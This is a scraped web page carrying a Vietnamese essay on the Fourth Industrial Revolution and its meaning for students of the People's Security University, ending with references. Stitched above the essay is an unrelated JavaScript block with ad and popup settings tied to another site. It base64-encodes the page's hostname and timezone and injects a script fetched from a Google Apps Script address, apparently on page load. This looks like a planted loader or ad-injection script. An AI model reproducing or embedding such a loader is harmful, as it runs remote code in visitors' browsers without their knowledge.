var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cuộc cách mạng công nghiệp 4.0 và tác động đối với sinh viên Trường Đại học An ninh nhân dân

1. Nhận thức về cuộc Cách mạng công nghiệp lần thứ 4

Trong lịch sử loài người đã và đang trải qua các cuộc cách mạng công nghiệp:

– Cách mạng công nghiệp lần thứ nhất vào năm 1784 khởi nguồn từ nước Anh đặc trưng là cơ khí hóa với máy chạy bằng thủy lực và phát minh ra động cơ hơi nước (phát minh này của James Watt công bố năm 1775) – Kỷ nguyên sản xuất cơ khí.

– Cách mạng công nghiệp lần thứ hai từ năm 1871 – 1914 đặc trưng là động cơ điện, vận tải, hóa học, sản xuất thép và sản xuất trên cơ sở điện cơ khí và sang giai đoạn tự động hóa và khởi nguồn từ Mỹ.

– Cách mạng công nghiệp lần thứ ba từ năm 1969, với sự ra đời của công nghệ thông tin, sử dụng điện tử và công nghệ thông tin để tự động hóa sản xuất. Được xúc tác bởi chất bán dẫn, siêu máy tính, laptop (1970 và 1980), Internet (thập niên 1990) trung tâm và khởi nguồn từ Mỹ.

– Cuộc cách mạng công nghiệp lần thứ tư đã và đang diễn ra một cách nhanh chóng chưa từng có trong lịch sử từ năm 2011, thuật ngữ “cách mạng công nghiệp lần thứ tư” đã được đề cập và sử dụng phổ biến trên toàn thế giới. Khái niệm “công nghiệp 4.0” (industry 4.0) hay nhà máy thông minh lần đầu tiên được đưa ra tại Hội chợ công nghiệp Hannover (Cộng hòa Liên bang Đức) vào năm 2011. Năm 2013, thuật ngữ công nghiệp 4.0 bắt đầu được tìm hiểu và tìm kiếm rộng rãi xuất phát từ một báo cáo của Chính phủ Đức đề cập đến cụm từ này nhằm nói tới chiến lược công nghệ cao, điện toán hóa ngành sản xuất mà không cần sự tham gia của con người. Tại Diễn đàn kinh tế thế giới lần thứ 46 ở thành phố Davos-Klosters, Thụy Sĩ (tháng 01/2016) với chủ đề “Cuộc cách mạng công nghiệp lần thứ tư”, Giáo sư Klaus Schwab – Chủ tịch Diễn đàn kinh tế thế giới đã đưa ra một khái niệm mới, mang tính phổ quát hơn: “Một cụm thuật ngữ cho các công nghệ và khái niệm tổ chức trong chuỗi giá trị” đi cùng với hệ thống vật lý không gian ảo, internet kết nối vạn vật (IoT) và internet các dịch vụ (IoS).

Sự phát triển của cách mạng công nghiệp 4.0 dựa trên ba trụ cột chính:

– Nguồn dữ liệu lớn (big data): dữ liệu lớn được thể hiện ở cả ba phương diện thời gian, không gian, đối tượng.

– Trí tuệ nhân tạo (AI): được thể hiện trên nhiều khía cạnh khác nhau nhưng tập trung chủ yếu vào robot và camera nhận diện thông minh.

Cuộc cách mạng công nghiệp 4.0 và tác động đối với sinh viên Trường Đại học An ninh nhân dân

Cuộc cách mạng công nghiệp lần thứ tư đang phát triển như vũ bão

– Internet kết nối vạn vật: Internet ngày nay đã trở thành một lực lượng vật chất quan trọng đối với mọi hoạt động của cuộc sống con người, không chỉ kết nối giữa con người với con người, giữa con người với vật thể mà còn giữa vật thể với vật thể – làm cho máy móc giao tiếp được với máy móc thông qua việc sử dụng công cụ hiện đại như email, website, điện thoại thông minh, thiết bị điện tử, thiết bị số hóa.

Đặc trưng của cách mạng công nghiệp 4.0 được thể hiện ở 3 điểm chính:

– Sự kết hợp giữa các hệ thống ảo và thực tế: Đây là xu hướng kết hợp giữa các hệ thống ảo và thực thể, vạn vật kết nối IoT và các hệ thống kết nối IoS. Nhờ khả năng kết nối thông qua các thiết bị di động và khả năng tiếp cận với cơ sở dữ liệu lớn, các tính năng xử lý thông tin sẽ được nhân lên bởi những đột phá công nghệ trong các lĩnh vực như trí tuệ nhân tạo, công nghệ người máy, xe tự lái, công nghệ in 3D, công nghệ nano, công nghệ sinh học, khoa học vật liệu, lưu trữ năng lượng và tính toán lượng tử.

– Có quy mô và tốc độ phát triển chưa từng có trong lịch sử loài người. “Nếu như các cuộc cách mạng công nghiệp trước đây diễn ra với tốc độ theo cấp số cộng (hay tuyến tính) thì tốc độ phát triển của cách mạng công nghiệp lần thứ tư này là theo cấp số nhân”. Theo đó, những đột phá công nghệ diễn ra trên nhiều lĩnh vực với tốc độ nhanh chóng và mức độ tương tác rộng lớn sẽ tạo ra một thế giới được số hóa, tự động hóa và hoạt động ngày càng trở nên hiệu quả, thông minh hơn.

– Có sự tác động mạnh mẽ và toàn diện đến thế giới đương đại. Điều này thể hiện ở sự ảnh hưởng sâu rộng trên tất cả các lĩnh vực như kinh tế, chính trị, văn hóa, xã hội, môi trường, quốc phòng, an ninh… với các cấp độ từ toàn cầu đến châu lục, khu vực và trong từng quốc gia.

2. Sinh viên Trường Đại học An ninh nhân dân sẽ làm gì và làm như thế nào trước tác động của cuộc Cách mạng công nghiệp lần thứ tư

Cuộc cách mạng công nghiệp lần thứ tư đang tác động sâu rộng tới nhận thức, cơ cấu kinh tế, thể chế chính trị, quan hệ giữa các dân tộc, tạo ra những cơ hội và những thách thức đối với mỗi quốc gia trong thời đại ngày nay.Cùng với toàn bộ các cơ quan, ban, ngành trên cả nước, lực lượng Công an nhân dân Việt Nam đang khẩn trương xây dựng và triển khai các biện pháp nhằm chủ động tham gia cuộc cách mạng công nghiệp lần thứ 4. Trong đó, với vai trò của nguồn nhân lực trẻ, thế hệ kế cận của Đảng, của Ngành trong tương lai, lực lượng sinh viên các trường Công an nhân dân nói chung và sinh viên Trường Đại học An ninh nhân dân nói riêng đang đứng trước cơ hội nắm bắt công nghệ để có thể đương đầu với thách thức khi nước ta thực sự bước vào cuộc cách mạng công nghiệp, nắm bắt chìa khóa mở ra cánh cửa bước vào sân chơi toàn cầu hóa.

Do vậy, sinh viên Trường Đại học An ninh nhân dân sẽ làm gì và làm như thế nào trước tác động của cuộc Cách mạng công nghiệp lần thứ tư:

Một là,nhận thức sâu sắc về tác động, ảnh hưởng to lớn của cuộc cách mạng công nghiệp lần thứ tư. Cuộc cách mạng này sẽ tạo ra động lực mới để thúc đẩy mạnh mẽ nền kinh tế nhiều quốc gia, vùng lãnh thổ chuyển sang nền kinh tế tri thức, sang xã hội “thông minh”. Sự giao thoa và hội tụ các lĩnh vực công nghệ cao sẽ xóa mờ dần ranh giới giữa các khâu/công đoạn, quy trình sản xuất, đặc biệt là các khâu thiết kế, gia công, lắp ráp và chế tạo ra sản phẩm, từ đó sản xuất sẽ đạt trình độ rất cao, tối ưu hóa cao, làm cho lợi ích kinh tế ngày càng trở nên rõ ràng hơn. Bên cạnh đó, cách mạng công nghiệp 4.0 sẽ phân cực lực lượng lao động, nguy cơ thất nghiệp gia tăng không chỉ của người nghèo và ở nước nghèo. Do đó, các quốc gia muốn tiến vào cuộc cách mạng công nghiệp này đòi hỏi phải có một nguồn nhân lực chất lượng cao có khả năng ứng dụng những tiến bộ khoa học công nghệ của cuộc cách mạng vào thực tiễn sản xuất để có thể đáp ứng được yêu cầu phát triển đặt ra. Chính vì vậy, ngay từ trên giảng đường đại học, sinh viên phải chủ động tích lũy tri thức về công nghệ thông tin, chủ động cập nhật kịp thời và ứng dụng những tiến bộ khoa học kỹ thuật mới nhất của thế giới vào học tập, công tác và cuộc sống.

Hai là, ứng dụng thành tựu của cách mạng 4.0 trong học tập, nghiên cứu: Kết nối internet toàn cầu mang lại cho mỗi cá nhân nguồn tài nguyên khổng lồ, vô vàn cơ hội tìm kiếm thông tin, tư liệu, sách trực tuyến. Đối với các môn học thuộc bộ mộn Lý luận chính trị và khoa học xã hội nhân văn, Pháp luật, Tâm lý, Tin học, Ngoại ngữ,… sinh viên hoàn toàn có thể chủ động tìm kiếm và lưu trữ các nguồn tài liệu tham khảo, kiến thức bổ sung, ứng dụng các phần mềm trên điện thoại, máy vi tính, laptop để thực hiện bài tập một cách khoa học, sáng tạo, sinh động và dễ nhớ, dễ hiểu. Thậm chí trong các môn học Nghiệp vụ, công nghệ đã được ứng dụng vào thư viện nghiệp vụ của Nhà trường, nhờ đó sinh viên có thể dễ dàng tìm kiếm giáo trình, sách, tư liệu, tài liệu,.. trên hệ thống phần mềm lưu trữ. Vì kiến thức là vô tận và ngày càng hoàn thiện, nên chỉ có sự kết nối tri thức toàn nhân loại mới là thư viện lớn nhất, đáp ứng yêu cầu tìm tòi, nghiên cứu của người học. Mấu chốt chính là sự khác biệt giữa việc lựa chọn học tập chủ động hay thụ động, ứng dụng một cách tích cực để cách mạng 4.0 vừa là động lực thúc đẩy, vừa là công cụ hỗ trợ cho sinh viên thực hiện mục tiêu của mình.

Hơn bao giờ hết, trước những khó khăn mà đại dịch Covid-19 mang lại, cuộc cách mạng 4.0, sự kết nối toàn cầu, chuyển đổi số,… đã chứng minh được tầm quan trọng và sự tất yếu trong mọi lĩnh vực của đời sống, từ kinh tế – xã hội đến giáo dục – đào tạo. Để đảm bảo “mục tiêu kép”, vừa thực hiện công tác phòng chống dịch bệnh, vừa tích cực, chủ động triển khai và hoàn thành xuất sắc các nhiệm vụ chuyên môn được giao, thầy và trò Trường Đại học An ninh nhân dân đã nhanh chóng thực hiện chuyển đổi số, dạy và học trực tuyến qua nhiều ứng dụng công nghệ như Google Meet, Kahoot!, Quizziz,… an toàn, hiệu quả.

Ba là,không ngừng rèn luyện, phát triển kỹ năng đáp ứng yêu cầu công tác trong tình hình mới. Song song với nhiệm vụ học tập, nhiệm vụ rèn luyện, phát triển toàn diện của sinh viên Trường Đại học An ninh nhân dân cũng được chú trọng, và đã có nhiều thay đổi vượt bậc cùng với sự phát triển của cuộc cách mạng lần thứ 4. Đoàn thanh niên, các Câu lạc bộ đã chủ động, sáng tạo tổ chức các hoạt động ứng dụng khoa học, công nghệ như Cuộc thi online “Sáng mãi truyền thống anh hùng” theo hình thức trả lời các câu hỏi, tìm hiểu kiến thức trực tuyến trên nền tảng website myaloha.com, xây dựng video clip tuyên truyền, thường xuyên viết bài đăng tải tại Trang sinh viên và website của Nhà trường, qua đó đã định hướng, lan tỏa cho sinh viên các khóa tích cực nghiên cứu, phát triển toàn diện các kỹ năng, đồng thời tham gia và đạt nhều thành tích cao trong các hội thi, cuộc thi quy mô lớn như Olympic toàn quốc các môn khoa học Mác – Lênin và tư tưởng Hồ Chí Minh “Ánh sáng soi đường”, “Olympic tiếng Anh dành cho cán bộ trẻ” do Trung ương Đoàn TNCS tổ chức, hay thi Hùng biện “Say to Succeed” của Trường Đại học Ngân hàng Thành phố Hồ Chí Minh với sự tham gia của sinh viên từ nhiều trường đại học khác nhau.

Cuộc cách mạng công nghiệp 4.0 và tác động đối với sinh viên Trường Đại học An ninh nhân dân

Tuổi trẻ Trường Đại học An ninh nhân dân vinh danh ở vị trí cao nhất của cuộc thi Olympic Tiếng Anh dành cho cán bộ trẻ lần II năm 2020.

Bốn là, mỗi sinh viên Trường Đại học An ninh nhân dân xác định rõ những cơ hội và thách thức của sự nghiệp bảo vệ an ninh quốc gia trước tác động của cách mạng công nghiệp lần thứ tư”, đặc biệt là các mối nguy cơ về an ninh phi truyền thống. Với những yêu cầu trong tình hình mới đòi hỏi lực lượng Công an nhân dân, trong đó có sinh viên Trường Đại học An ninh nhân dân phải không ngừng nâng cao trình độ để đảm bảo an ninh, phòng chống tội phạm trên không gian mạng, tội phạm công nghệ cao, tội phạm xuyên quốc gia, đa quốc gia… Bên cạnh những mặt tích cực, cần trang bị hiểu biết và cách thức nhận diện, đấu tranh, loại bỏ những tác động tiêu cực của lỗ hổng an ninh mạng, bảo vệ bí mật nhà nước, tác động xấu từ mạng xã hội…

Năm là, bản thân mỗi sinh viên của Nhà trường cần tự giác, chủ động, liên tục tìm tòi, cập nhật những tri thức mới, sẵn sàng học hỏi và đổi mới, đặc biệt là về những tiến bộ khoa học công nghệ và kỹ năng ứng dụng vào thực tiễn (như việc sử dụng hệ thống camera giám sát giao thông kết nối, cải cách thủ tục hành chính trong quản lý nhân hộ khẩu, ứng dụng công nghệ thông tin trong quản lý về an ninh trật tự, thủ tục xuất nhập cảnh, cấp thị thực điện tử…), phát triển toàn diện về ngoại ngữ, kỹ năng mềm. Trong bối cảnh toàn lực lượng đang ra sức góp phần đẩy lùi đại dịch Covid-19, các khóa sinh viên Trường Đại học An ninh nhân dân không chỉ trực tiếp xung kích trên tuyến đầu chống dịch mà còn phải tích cực lan tỏa những thông tin đúng đắn, chủ động nhận diện thủ đoạn tinh vi của các phần tử xấu, bảo vệ “vùng xanh” trên không gian mạng trong tình hình hiện nay. Để “Với tinh thần đổi mới, sáng tạo và phát triển, tin tưởng rằng Trường Đại học An ninh nhân dân sẽ viết tiếp trang sử hào hùng của một tập thể đã trải qua muôn vàn thử thách trong cả thời chiến lẫn thời bình, xứng đáng với truyền thống Anh hùng để vững bước tiến lên” [2].

Hồ Thị Quỳnh Ngân

TÀI LIỆU THAM KHẢO

1. Tô Lâm (2021). Đề cương chuyên đề “Những nhận thức mới, tư duy mới về an ninh quốc gia trong Nghị quyết Đại hội đại biểu toàn quốc lần thứ XIII của Đảng”, Nxb. Chính trị quốc gia Sự thật, Hà Nội.

2. Võ Hồng Công. “Chuyển đổi số – Trọng tâm hiện đại hóa Trường Đại học An ninh nhân dân giai đoạn 2020 – 2025, tầm nhìn đến 2030”, từ <http://dhannd.edu.vn/chuyen-doi-so-trong-tam-hien-dai-hoa-truong-dai-hoc-an-ninh-nhan-dan-giai-doan-2020-2025-tam-nhin-den-2030-a-1214>.